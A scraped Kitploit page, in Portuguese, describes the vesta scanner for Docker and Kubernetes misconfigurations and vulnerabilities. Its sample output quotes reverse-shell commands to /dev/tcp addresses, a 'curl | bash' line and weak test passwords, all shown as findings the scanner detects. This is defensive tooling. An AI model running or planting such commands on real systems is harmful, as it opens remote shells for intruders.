Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
vesta — Uma análise estática de vulnerabilidades, detecção de configuração de cluster Docker e Kubernetes, um kit de ferramentas baseado na penetração real da computação em nuvem | Kitploit
Ferramentas/GitHubGitHub/kvesta/vesta
Análise EstáticaScanners de VulnerabilidadesSegurança de ContêineresAuditoria de ConfiguraçãoSegurança na NuvemDevSecOps
GitHubkvesta/vesta

vesta

Uma análise estática de vulnerabilidades, detecção de configuração de cluster Docker e Kubernetes, um kit de ferramentas baseado na penetração real da computação em nuvem

Ver Repositório
20531há 1 anoRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar


Uma análise estática de vulnerabilidades, detecção de configuração de cluster Docker e Kubernetes baseada na penetração real de computação em nuvem.

English · 简体中文

Visão Geral

Vesta é uma ferramenta de análise estática de vulnerabilidades e detecção de configuração de cluster Docker e Kubernetes. Ela inspeciona configurações do Kubernetes e Docker, pods de cluster e contêineres com práticas seguras.

Vesta é uma ferramenta flexível que pode ser executada em máquinas físicas em diferentes tipos de sistemas (Windows, Linux, MacOS).

O que o vesta pode verificar

Varredura

  • Suporta entrada de varredura
    • imagem
    • contêiner
    • sistema de arquivos
    • vm (TODO)
  • Varredura de vulnerabilidades dos principais gerenciadores de pacotes
    • apt/apt-get
    • rpm
    • yum
    • dpkg
  • Varredura de pacotes maliciosos e vulnerabilidades de pacotes específicos de linguagem
    • Java(Jar, War. principal biblioteca: log4j)
    • NodeJs(NPM, YARN)
    • Python(Wheel, Poetry)
    • Golang(Go binary)
    • PHP(Composer, principais frameworks: laravel, thinkphp, wordpress, plugins wordpress etc)
    • Rust(Rust binary)
    • Outros(Outros vulneráveis que podem causar uma fuga potencial de contêiner e verificar imagem suspeita de envenenamento)

Docker


Kubernetes

Build

Vesta é construída com Go 1.18.```bash make build

root@kitploit:~
## Início Rápido

Exemplo de scan de imagem ou container, use `-f` para entrada por um arquivo tar, inicie vesta:```bash
# Container
vesta scan image cve-2019-14234_web:latest
vesta scan image -f example.tar

# Image
vesta scan container <CONTAINER ID>
vesta scan container -f example.tar

# Filesystem
vesta scan fs <path_of_filesystem>

Saída:```bash 2022/11/29 22:50:00 Searching for image 2022/11/29 22:50:19 Begin upgrading vulnerability database 2022/11/29 22:50:19 Vulnerability Database is already initialized 2022/11/29 22:50:19 Begin to analyze the layer 2022/11/29 22:50:35 Begin to scan the layer

Detected 216 vulnerabilities

+-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+ | 208 | python3.6 - Django | 2.2.3 | CVE-2019-14232 | 7.5 | high | An issue was discovered | | | | | | | | in Django 1.11.x before | | | | | | | | 1.11.23, 2.1.x before 2.1.11, | | | | | | | | and 2.2.x before 2.2.4. If | | | | | | | | django.utils.text.Truncator's | | | | | | | | chars() and words() methods | | | | | | | | were passed the html=True | | | | | | | | argument, t ... | +-----+ +-----------------+------------------+-------+----------+------------------------------------------------------------------+ | 209 | | 2.2.3 | CVE-2019-14233 | 7.5 | high | An issue was discovered | | | | | | | | in Django 1.11.x before | | | | | | | | 1.11.23, 2.1.x before 2.1.11, | | | | | | | | and 2.2.x before 2.2.4. | | | | | | | | Due to the behaviour of | | | | | | | | the underlying HTMLParser, | | | | | | | | django.utils.html.strip_tags | | | | | | | | would be extremely ... | +-----+ +-----------------+------------------+-------+----------+------------------------------------------------------------------+ | 210 | | 2.2.3 | CVE-2019-14234 | 9.8 | critical | An issue was discovered in | | | | | | | | Django 1.11.x before 1.11.23, | | | | | | | | 2.1.x before 2.1.11, and 2.2.x | | | | | | | | before 2.2.4. Due to an error | | | | | | | | in shallow key transformation, | | | | | | | | key and index lookups for | | | | | | | | django.contrib.postgres.f ... | +-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+ | 211 | python3.6 - numpy | 1.24.2 | | 8.5 | high | Malicious package is detected in | | | | | | | | '/usr/local/lib/python3.6/site-packages/numpy/setup.py', | | | | | | | | malicious command "curl | bash" are | | | | | | | | detected. | +-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+

Docker Histories: +----+---------------+----------------------------+-------+-------+--------+--------------------------------+ | ID | NAME | CURRENT/VULNERABLE VERSION | CVEID | SCORE | LEVEL | DESCRIPTION | +----+---------------+----------------------------+-------+-------+--------+--------------------------------+ | 1 | Image History | - / - | - | 0.0 | high | Confusion value found | | | | | | | | in ENV: 'command' with | | | | | | | | the plain text 'bash -i | | | | | | | | >&/dev/tcp/127.0.0.1/9999 0>&1 | | | | | | | | '. | +----+---------------+----------------------------+-------+-------+--------+--------------------------------+ | 2 | | - / - | - | 0.0 | medium | Docker history has found the | | | | | | | | senstive environment with | | | | | | | | key 'SECRET_KEY' and value: | | | | | | | | 123456. | +----+---------------+----------------------------+-------+-------+--------+--------------------------------+

root@kitploit:~
<details>
<summary>Resultado</summary>

![](https://assets.kitploit.com/production/public/readmes/5859/9812488f35975e6dfeb2fb38e3498564a2fd1c8d699ccbff2f409390dcc39afd.gif)

</details>

Exemplo de verificação de configuração do Docker, iniciar vesta:```bash
vesta analyze docker

Ou execute com dokcer```bash make run.docker

root@kitploit:~
Saída:```bash
2022/11/29 23:06:32 Start analysing
2022/11/29 23:06:32 Getting engine version
2022/11/29 23:06:32 Getting docker server version
2022/11/29 23:06:32 Getting kernel version

Detected 3 vulnerabilities

+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
| ID |      CONTAINER DETAIL      |     PARAM      |             VALUE              | SEVERITY |          DESCRIPTION           |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
|  1 | Name: Kernel               | kernel version | 5.10.104-linuxkit              | critical | Kernel version is suffering    |
|    | ID: None                   |                |                                |          | the CVE-2022-0492 with         |
|    |                            |                |                                |          | CAP_SYS_ADMIN and v1           |
|    |                            |                |                                |          | architecture of cgroups        |
|    |                            |                |                                |          | vulnerablility, has a          |
|    |                            |                |                                |          | potential container escape.    |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
|  2 | Name: vesta_vuln_test      | kernel version | 5.10.104-linuxkit              | critical | Kernel version is suffering    |
|    | ID: 207cf8842b15           |                |                                |          | the Dirty Pipe vulnerablility, |
|    |                            |                |                                |          | has a potential container      |
|    |                            |                |                                |          | escape.                        |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
|  3 | Name: Image Tag            | Privileged     | true                           | critical | There has a potential container|
|    | ID: None                   |                |                                |          | escape in privileged  module.  |
|    |                            |                |                                |          |                                |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
|  4 | Name: Image Configuration  | Image History  | Image name:                    | high     | Weak password found            |
|    | ID: None                   |                | vesta_history_test:latest |    |          | in command: ' echo             |
|    |                            |                | Image ID: 4bc05e1e3881         |          | 'password=test123456' >        |
|    |                            |                |                                |          | config.ini # buildkit'.        |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+

Exemplo de varredura de configuração do Kubernetes, iniciar vesta:```bash vesta analyze k8s

root@kitploit:~
Saída:```bash
2022/11/29 23:15:59 Start analysing
2022/11/29 23:15:59 Getting docker server version
2022/11/29 23:15:59 Getting kernel version

Detected 4 vulnerabilities

Pods:
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
| ID |           POD DETAIL           |             PARAM              |             VALUE              |         TYPE          | SEVERITY |          DESCRIPTION           |
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
|  1 | Name: vulntest | Namespace:    | sidecar name: vulntest |       | true                           | Pod                   | critical | There has a potential          |
|    | default | Status: Running |    | Privileged                     |                                |                       |          | container escape in privileged |
|    | Node Name: docker-desktop      |                                |                                |                       |          | module.                        |
+    +                                +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
|    |                                | sidecar name: vulntest |       | Token:Password123456           | Sidecar EnvFrom       | high     | Sidecar envFrom ConfigMap has  |
|    |                                | env                            |                                |                       |          | found weak password:           |
|    |                                |                                |                                |                       |          | 'Password123456'.              |
+    +                                +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
|    |                                | sidecar name: sidecartest |    | MALWARE: bash -i >&            | Sidecar Env           | high     | Container 'sidecartest' finds  |
|    |                                | env                            | /dev/tcp/10.0.0.1/8080 0>&1    |                       |          | high risk content(score:       |
|    |                                |                                |                                |                       |          | 0.91 out of 1.0), which is a   |
|    |                                |                                |                                |                       |          | suspect command backdoor.      |
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
|  2 | Name: vulntest2 | Namespace:   | sidecar name: vulntest2 |      | CAP_SYS_ADMIN                  | capabilities.add      | critical | There has a potential          |
|    | default | Status: Running |    | capabilities                   |                                |                       |          | container escape in privileged |
|    | Node Name: docker-desktop      |                                |                                |                       |          | module.                        |
+    +                                +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
|    |                                | sidecar name: vulntest2 |      | true                           | kube-api-access-lcvh8 | critical | Mount service account          |
|    |                                | automountServiceAccountToken   |                                |                       |          | and key permission are         |
|    |                                |                                |                                |                       |          | given, which will cause a      |
|    |                                |                                |                                |                       |          | potential container escape.    |
|    |                                |                                |                                |                       |          | Reference clsuterRolebind:     |
|    |                                |                                |                                |                       |          | vuln-clusterrolebinding |      |
|    |                                |                                |                                |                       |          | roleBinding: vuln-rolebinding  |
+    +                                +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
|    |                                | sidecar name: vulntest2 |      | cpu                            | Pod                   | low      | CPU usage is not limited.      |
|    |                                | Resource                       |                                |                       |          |                                |
|    |                                |                                |                                |                       |          |                                |
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+

Configures:
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
| ID |            TYPEL            |             PARAM              |                         VALUE                          | SEVERITY |          DESCRIPTION           |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
|  1 | K8s version less than v1.24 | kernel version                 | 5.10.104-linuxkit                                      | critical | Kernel version is suffering    |
|    |                             |                                |                                                        |          | the CVE-2022-0185 with         |
|    |                             |                                |                                                        |          | CAP_SYS_ADMIN vulnerablility,  |
|    |                             |                                |                                                        |          | has a potential container      |
|    |                             |                                |                                                        |          | escape.                        |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
|  2 | ConfigMap                   | ConfigMap Name: vulnconfig     | db.string:mysql+pymysql://dbapp:Password123@db:3306/db | high     | ConfigMap has found weak       |
|    |                             | Namespace: default             |                                                        |          | password: 'Password123'.       |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
|  3 | Secret                      | Secret Name: vulnsecret-auth   | password:Password123                                   | high     | Secret has found weak          |
|    |                             | Namespace: default             |                                                        |          | password: 'Password123'.       |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
|  4 | ClusterRoleBinding          | binding name:                  | verbs: get, watch, list,                               | high     | Key permissions with key       |
|    |                             | vuln-clusterrolebinding |      | create, update | resources:                            |          | resources given to the         |
|    |                             | rolename: vuln-clusterrole |   | pods, services                                         |          | default service account, which |
|    |                             | kind: ClusterRole | subject    |                                                        |          | will cause a potential data    |
|    |                             | kind: Group | subject name:    |                                                        |          | leakage.                       |
|    |                             | system:serviceaccounts:vuln |  |                                                        |          |                                |
|    |                             | namespace: vuln                |                                                        |          |                                |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
|  5 | RoleBinding                 | binding name: vuln-rolebinding | verbs: get, watch, list,                               | high     | Key permissions with key       |
|    |                             | | rolename: vuln-role | role   | create, update | resources:                            |          | resources given to the         |
|    |                             | kind: Role | subject kind:     | pods, services                                         |          | default service account, which |
|    |                             | ServiceAccount | subject name: |                                                        |          | will cause a potential data    |
|    |                             | default | namespace: default   |                                                        |          | leakage.                       |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
|  6 | ClusterRoleBinding          | binding name:                  | verbs: get, watch, list,                               | warning  | Key permission are given       |
|    |                             | vuln-clusterrolebinding2 |     | create, update | resources:                            |          | to unknown user 'testUser',    |
|    |                             | rolename: vuln-clusterrole |   | pods, services                                         |          | printing it for checking.      |
|    |                             | subject kind: User | subject   |                                                        |          |                                |
|    |                             | name: testUser | namespace:    |                                                        |          |                                |
|    |                             | all                            |                                                        |          |                                |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
Result

Informações de ajuda```bash

$./vesta -h Vesta is a static analysis of vulnerabilities, Docker and Kubernetes configuration detect toolkit Tutorial is available at https://github.com/kvesta/vesta

Usage: vesta [command]

Available Commands: analyze Kubernetes analyze completion Generate the autocompletion script for the specified shell help Help about any command scan Container scan update Update vulnerability database version Print version information and quit

Flags: -h, --help help for vesta

root@kitploit:~
## Evento

### Lista de armas do KCon 2023
- [https://kcon.knownsec.com/index.php?s=bqp&c=category&id=2](https://kcon.knownsec.com/index.php?s=bqp&c=category&id=2)
Baixar ferramenta
SuportadoItem de VerificaçãoDescriçãoSeveridadeReferência
✔PrivilegeAllowedMódulo privilegiado está permitido.criticalRef
✔CapabilitiesCapacidades perigosas estão abertas.criticalRef
✔Volume MountMontagem de local perigoso.criticalRef
✔Docker UnauthorizedPorta 2375 está aberta e não autorizada.criticalRef
✔Kernel versionVersão do kernel está abaixo da versão de fuga.criticalRef
✔Network ModuleMódulo de rede é host e versão do containerd menor que 1.41.critical/medium
✔Pid ModuleMódulo PID é host.high
✔Docker Server versionVersão do servidor está incluída na versão vulnerável.critical/high/ medium/low
✔Docker env password checkVerificação de senha fraca no banco de dados.high/medium
✔Docker HistoryCamadas e ambiente do Docker possuem comandos perigosos.high/medium
✔Docker BackdoorComando env do Docker possui comandos maliciosos.critical/high
✔Docker SwarmDocker swarm possui configuração perigosa ou segredos ou contêineres inseguros.medium/low
✔Docker supply chainCadeia de suprimentos do Docker possui configurações vulneráveiscritical/high/ mediumRef
SuportadoItem de VerificaçãoDescriçãoSeveridadeReferência
✔PrivilegeAllowedMódulo privilegiado está permitido.criticalRef
✔CapabilitiesCapacidades perigosas estão abertas.criticalRef
✔PV and PVCPV está montado em local perigoso e ativo.critical/mediumRef
✔RBACRBAC possui algumas configurações inseguras no clusterrolebinding ou rolebinding.high/medium/ low/warning
✔Kubernetes-dashboradVerificando -enable-skip-login e permissão de conta.critical/high/lowRef
✔Kernel versionVersão do kernel está abaixo da versão de fuga.criticalRef
✔Docker Server version (k8s versions is less than v1.24)Versão do servidor está incluída na versão vulnerável.critical/high/ medium/low
✔Kubernetes certification expirationCertificação expirou após 30 dias.medium
✔ConfigMap and Secret checkVerificação de senha fraca no ConfigMap ou Secret.high/medium/lowRef
✔PodSecurityPolicy check (k8s version under the v1.25)PodSecurityPolicy tolera configurações perigosas de pod.high/medium/lowRef
✔Auto Mount ServiceAccount TokenMontando token de serviço padrão.critical/high/ medium/lowRef
✔NoResourceLimitsNenhum limite de recurso definido.lowRef
✔Job and CronjobNenhum seccomp ou seLinux definido em Job ou CronJob.lowRef
✔Envoy adminAdmin do Envoy está aberto e ouvindo em 0.0.0.0.high/mediumRef
✔Cilium versionCilium possui versão vulnerável.critical/high/ medium/lowRef
✔Istio configurationsIstio possui versão vulnerável e configurações vulneráveis.critical/high/ medium/lowRef
✔Kubelet 10250/10255 and Kubectl proxyPortas 10255/10250 estão abertas e não autorizadas ou Kubectl proxy está aberto.high/medium/low
✔Etcd configurationVerificação de configuração segura do Etcd.high/medium
✔Sidecar configurationsSidecar possui algumas configurações perigosas.critical/high/ medium/low
✔Pod annotationAnotação de pod possui algumas configurações inseguras.high/medium/ low/warningRef
✔DaemonSetDaemonSet possui configurações inseguras.critical/high/ medium/low
✔BackdoorDetecção de backdoor.critical/highRef
✔Lateral admin movementPod específica um nó mestre.medium/low
https://vuln.com